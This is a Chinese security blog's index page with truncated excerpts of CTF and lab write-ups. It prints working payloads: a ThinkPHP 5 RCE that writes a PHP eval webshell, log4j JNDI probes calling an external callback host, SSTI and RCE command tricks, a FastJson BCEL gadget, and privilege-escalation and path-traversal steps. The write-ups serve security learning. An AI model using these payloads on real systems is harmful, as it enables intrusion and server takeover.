L的博客

ps 我个人是在美国的服务器上架设代理，在vps上连接openvpn，然后使用proxifier来转发流量，liunx就用proxychains4，这样虽然比较快，但是端口扫描就只能在服务器上做了常用nmap全端口扫描1nmap -sS -sV 10.129.88.187 -p- -T5 -vv 拿到shell拿到shell后先尝试提权看用户文件而后查看后台进程 ps -aux传fscan扫其他主机的服务 Meow nmap扫太慢了，拿fscan扫可以发现开启了23端口telnet服务，尝试登陆 1telnet 10.129.150.178 直接root登陆，未授权。 正常可以用msf来爆破 kali自带自带子在1/usr/share/wordlists/legion/ Fawn FTP存在匿名登陆 匿名账号anonymous 使用msf的ftp login 模块设置好字典，账号密码用空格分隔+1set USERPASS_FILE /usr/share/wordlists/legion/ftp-betterdefaultpasslist.txt 爆破出来后可以用 ...

[HZNUCTF 2023 final]ezjava 打开靶机其告诉我们会将uri的值计入log,且fastjson的版本为1.2.48首先这个版本的fastjson是不存在我们所俗知的fastjson反序列化漏洞的,其只存在原生反序列化漏洞,而题目说会将内容计入log,着让人想到了log4j的漏洞从jndi注入到log4j注入先尝试以下payload1${jndi:dns://v73iwpad5ajfj3cacftbwptl7cd31vpk.oastify.com} 可以发现成功进行了dns请求者就证明了此处存在JNDI注入我们再探测以下java版本1${jndi:dns://${sys:java.version}.v73iwpad5ajfj3cacftbwptl7cd31vpk.oastify.com} 可以发现其版本为1.8.0.222这个版本的java是无法直接通过ldap来进行命令执行的而题目说其fastjson的版本为1.2.48.那么我们就可以使用ldap来触发fastjson原生反序列化从而命令 ...

今天不知道学点什么就氪金打了一下春秋云镜的靶场。只能说我对域的了解几乎为0。这篇文章记录一下域渗透的一些知识，和tp——cve的漏洞成因吧thinkphp5.23rce漏洞再路由随便传参数?s=asdwdwa就会发生报错，通过报错可以发现该think版本为5.23其漏洞payload如下123GET /?s=captcha_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo 'PD9waHAgZXZhbCgkX1BPU1RbMV0pO3BocGluZm8oKTs/Pg==' |base64 -d > shell.php我们直接写马通过哥斯拉来连接 其权限为www-data。我们先进行常规提权。先尝试suid提权并没有发现可以利用的命令再尝试进行sudo提权可以发现我们能够无密码使用mysql我这里贴一个sudo提权的文章Linux提权之Sudo 70种提权方法（上）Linux提权之Sudo 70种提权方法（中）Linux提权之Sudo 7 ...

Really_Ez_Rceecho -n bas >>/tmp/bascmd=echo -n e64 >>/tmp/bascmd=echo ZmxhZy50eHQ=|dd if=/tmp/bas>cmd=echo bHM=|dd if=/tmp/bas -d >aacmd=echo dGFjIC9mKg==|dd if=/tmp/bas -d >aa 123{"\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f":{"\u0061\u0070\u0070":{"\u005f\u0073\u0074\u0061\u0074\u0069\u0063\u005f\u0066\u006f\u006c\u0064\u0065\u0072":"\u002f"}}} 12345678910{ ...

d3model1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950import kerasfrom flask import Flask, request, jsonifyimport osdef is_valid_model(modelname): try: keras.models.load_model(modelname) except: return False return Trueapp = Flask(__name__)@app.route('/', methods=['GET'])def index(): return open('index.html').read()@app.route('/upload', methods=['POST'])def upload_file(): if ...

easy_file admin/password后台是文件上传经过尝试发现是白名单，那么就只好找文件包含或者解析漏洞了。在index的源码发现file查看文件在admin.php使用file参数可以文件包含，文件内容也有过滤直接短标签即可 nest_jsadmin/password 啊{%print(url_for.__globals__.__builtins__['__import__']('os').popen('tac /flag').read())%} 123{"settings":{"theme":"asd","language":"asd","isAdmin":true}} 123{"settings":{"theme":"asd","language":& ...

FastJsonBCEL首先就是要介绍一下BCEL链 apache-BCEL 在类加载时我们可以将，类转为字节码然后实验classloader来加载字节码，像是我们的CC3中的defineCLass。而这个我们要学的这个链，其就是利用加载字节码的方法来命令执行。但又有点不同，因为CC3是直接加载字节码，而我们这个链是利用了forName来加载 链子分析其payload如下1234567{"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource","driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"},"driverClassName": "$$BCEL$$$l$8b......"}我们直接看可以发现其实这个很短，就涉及到了两个类org.apache ...

shiro+heapdump首先先拿fscan扫一下ip 可以发现存在heapdump的泄露 这个页面长的就很想shiro，扫一下指纹 果然是shiro解密一下heapdump，可以得到shiro-key，这样就可以打shiro反序列化了直接上线vshell拿到flag1 工程师个人主机然后再用fscan扫一下c段可以扫到一下ftp。还有一个web，先看一下web 目录结构和ftp一样应该是把ftp的目录也给放到web了再内部资料里发现了admin的账号密码还有内部通知和exel表格看通知我们可以知道账号密码是由姓名+@+工号组成的，二表格是工程师的姓名加工号使用第一个chenhua@0813即可登陆成功 我们可以发现其是再Backup Operators组内的，但是其并没有这给组内的特权，我用网上的提权方法都无法成功，应该是环境的问题，我这里就记录一下这个提权方法 https://github.com/k4sth4/SeBackupPrivilege再GitHub上下载两个dll，进行如下操作就可以备份admin的目录了，而且可以使用dir来 ...

ezblog首先看源码可以看到 只要访问blcakdoor输入指定key就可以得到flag 但是看不了有什么绕过逻辑，所以我看了眼app这个main类发现指定了某个静态文件夹。这时候我想到会不会有静态目录穿越，所以就试了一下..%2Fapp.jar发现成功读取了读取到app.jar也就知道了key，这题就结束了。 漏洞分析出于好奇我就看了一些依赖发现这个是solon框架的，而且版本还不低，所以我在网上查了一下，发现在今年有个 CVE-2025-1584,但是没有分析文章，所以就只好看一下代码改了啥自己分析了我们可以看到其主要更改了solon-projects/solon-web/solon-web-staticfiles/src/main/java/org/noear/solon/web/staticfiles/StaticMappings.java的路径判断检测了../来防止目录穿越。3.08是没有检测的，当路径有../时也可以进入